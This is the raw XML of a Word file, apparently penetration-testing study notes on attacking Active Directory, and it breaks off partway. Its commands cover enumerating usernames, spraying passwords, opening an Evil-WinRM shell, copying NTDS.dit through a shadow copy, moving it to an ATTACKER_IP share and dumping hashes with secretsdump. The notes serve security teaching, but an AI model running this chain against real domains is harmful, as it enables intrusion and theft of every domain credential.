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23417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📘</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E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DETAILED NOTES: Attacking Active Directory &amp; NTDS.dit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5865501D" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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69093189">
          <v:rect id="_x0000_i1127" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BF48BE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1️</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E6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CA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>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What is Active Directory (AD)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6256838D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Active Directory (AD)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is Microsoft’s centralized system to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C01B2F5" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Manage 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users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583B28B6" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Manage 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computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7095A16F" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Control 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authentication &amp; authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375F1EEE" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Enforce 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security policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573250D3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👉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If a company uses Windows in an enterprise → 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AD is almost always present</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4053899E" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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20BE4A1C">
          <v:rect id="_x0000_i1128" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD33981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2️</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E6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CA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>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How Authentication Works in a Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4551F22A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🔹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Before Domain Join</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C4091A" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Windows checks 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local SAM database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429E0E1A" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Credentials stored locally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448FC566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🔹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After Domain Join</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A94BE9B" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Windows 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no longer checks local SAM by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1761375F" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Authentication is sent to the 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Domain Controller (DC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0796030B" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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DC validates credentials using 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NTDS.dit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FF7412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📌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Local accounts still work if you log in as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03149D6D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HOSTNAME\username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E80BA1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or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0912FFB4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.\username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E84933" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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3F2DD8E2">
          <v:rect id="_x0000_i1129" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="424CF4D5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3️</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E6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CA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>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Why NTDS.dit Is Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5957E9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NTDS.dit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is the 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heart of Active Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078E58E5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t>It contains:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF4F519" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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All 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domain usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226BAADB" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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NTLM password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17866742" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Kerberos keys (AES, DES)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A33FE55" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Account metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B0D4ED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📍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Location on DC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E55DF7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C:\Windows\NTDS\NTDS.dit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B52ACB7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⚠️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If attacker gets NTDS.dit → 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entire domain is compromised</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB8B61B" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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5CE61F3B">
          <v:rect id="_x0000_i1130" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="622F0A8A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4️</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E6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CA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>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Dictionary &amp; Password Attacks (Pre-NTDS Phase)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B43D27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🎯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Goal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9AE606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Get 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valid domain credentials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later access the DC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63773A63" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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0348FF11">
          <v:rect id="_x0000_i1131" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7007C95E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5️</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E6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CA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>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Username Enumeration (Before Password Attacks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C52071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Why enumerate usernames?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267A94A6" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Avoid guessing passwords for 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non-existent users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A5790C" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Reduce noise and lockouts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3221ABE9" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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226DE07B">
          <v:rect id="_x0000_i1132" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CCC85C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🔧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Tool: Kerbrute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2F4C89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Kerbrute abuses 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Kerberos pre-authentication behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4097F8D0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📌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Command explained:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2131239F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kerbrute userenum --dc &lt;DC_IP&gt; --domain &lt;domain&gt; names.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75305F5A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What happens internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC702AB" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Sends Kerberos requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBE4770" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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DC responds differently for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC7946A" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E6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t>Valid user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459582BF" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E6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Invalid user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C5A3DE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✅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Valid usernames are confirmed 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without passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202C4442" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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6C499617">
          <v:rect id="_x0000_i1133" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D434BD3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6️</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E6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CA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>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Creating Username Lists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C0D22A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Manual method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754B8067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Based on employee names:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C89E607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bwilliamson</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014A8911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ben.williamson</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237901A8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williamson.ben</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74415183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Automated tool: Username Anarchy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E0FEE0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Generates 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dozens of username formats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from real names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9E7F03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Why this matters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7B734C" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Most orgs follow predictable naming conventions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34032950" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Reduces brute-force space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7854C1E5" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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5E0FE52B">
          <v:rect id="_x0000_i1134" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="669F543E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7️</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E6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CA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>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Password Brute-Force / Spraying</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096FB7A7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🔧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Tool: NetExec (CrackMapExec successor)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE52F14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📌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Command explained:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4BC896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netexec smb &lt;DC_IP&gt; -u &lt;username&gt; -p &lt;password_list&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025B16C9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What NetExec does:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B85CCE5" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E6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Uses SMB authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57127004" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E6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Attempts login with each password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79603FE9" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E6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Reports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C80D483" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E6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❌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Failed login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7565A3FE" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E6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✅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Successful login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57513198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lastRenderedPageBreak/>
        <w:t>📌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Example success:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E88AD4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bwilliamson:P@55w0rd!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5422D576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⚠️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Risk:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5763DFAA" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Can trigger account lockouts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8867C2" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Generates Security Event Logs (ID 4776)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65013FA3" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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22D7835B">
          <v:rect id="_x0000_i1135" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF338F6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8️</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E6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CA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>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Gaining Remote Access (Evil-WinRM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDD3306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Once credentials are valid:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFB3830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🔧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Tool: Evil-WinRM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA73619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📌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Command explained:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D31A73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evil-winrm -i &lt;DC_IP&gt; -u &lt;user&gt; -p &lt;password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAA7E8D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What this gives you:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC5B9B9" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E6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Interactive PowerShell session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7572A128" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E6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Remote control of the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499D6927" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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40D700A4">
          <v:rect id="_x0000_i1136" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D7CD1E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9️</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E6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CA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>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Checking Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE4CA79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Check local groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57383DE0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net localgroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AAA3E0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Looking for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645D989F" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B4FA34" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Backup Operators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEF930E" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Server Operators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E944CC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Check domain privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77010F3D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net user &lt;username&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB27BC9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t>If user is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2043CC20" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Domain Admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FAB613" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Local Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2427D790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👉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You can extract NTDS.dit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27856EEE" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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13407177">
          <v:rect id="_x0000_i1137" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FD5C1B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🔟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Why NTDS.dit Cannot Be Copied Directly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C341C3" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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NTDS.dit is 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locked by the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBEBA65" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Always in use by LSASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F018563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❌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Direct copy fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286718DC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✅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Solution: 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Volume Shadow Copy (VSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163166FF" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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2A4DAC90">
          <v:rect id="_x0000_i1138" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00490B86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1️</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E6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CA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>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1</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E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️⃣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Creating a Shadow Copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4BC0B7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🔧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Tool: vssadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2CE654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📌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Command explained:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8CEF10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vssadmin CREATE SHADOW /For=C:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BBF924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What this does:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E519E61" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Creates a 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read-only snapshot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of disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C35A530" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Bypasses file locks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710EF3E2" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Used by backup software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AF0FF3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📌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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0803B805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\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B74A06" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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00E1CAFC">
          <v:rect id="_x0000_i1139" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9F701E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1️</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E6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CA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>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2</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E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️⃣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Copying NTDS.dit from Shadow Copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629D019E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📌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Command explained:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C53F89E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lastRenderedPageBreak/>
        <w:t>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\Windows\NTDS\NTDS.dit C:\NTDS\NTDS.dit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C75A6A7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✔️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This works because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48874C07" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Snapshot is static</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097C9006" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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File isn’t locked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AADE3BD" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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7134E1A3">
          <v:rect id="_x0000_i1140" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C068DEB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1️</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E6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CA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>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3</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E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️⃣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Why SYSTEM File Is Also Needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327F5C6B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NTDS hashes are encrypted using a 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boot key stored in SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B094BDD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📌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Required files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB032B5" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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NTDS.dit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1895FFEE" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D880D73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Without SYSTEM → hashes cannot be decrypted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7778D342" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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14C11DFC">
          <v:rect id="_x0000_i1141" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="714D8D0D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1️</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E6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CA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>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4</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E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️⃣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Transferring Files to Attack Host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47291226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Usually via:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAA2156" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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SMB share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CD9870" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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move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or </w:t>
      </w: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copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345DE35E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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E86F75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move NTDS.dit \\ATTACKER_IP\share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40089AF8" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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4FA7FDA0">
          <v:rect id="_x0000_i1142" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="252DF02A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1️</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E6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CA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>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5</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E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️⃣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Extracting Hashes (Offline)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E634D74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🔧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Tool: Impacket – secretsdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729F3EF1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📌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Command explained:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623EA1A7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impacket-secretsdump -ntds NTDS.dit -system SYSTEM LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CC787C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What it does:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A36E758" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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t>Extracts boot key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4755DA95" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Decrypts NTLM hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AF6823" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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Dumps Kerberos keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3AD0AB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📌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Output format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6414AC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username:RID:LM:NTLM:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7A018C" w14:textId="77777777" w:rsidR="006C4E65" w:rsidRPr="006C4E65" w:rsidRDefault="006C4E65" w:rsidP="006C4E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7AB9BBFD">
          <v:rect id="_x0000_i1143" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9A2362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1️</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E6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CA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>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6</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E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️⃣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Faster Method: NetExec NTDS Module</w:t>
      </w:r>
    </w:p>
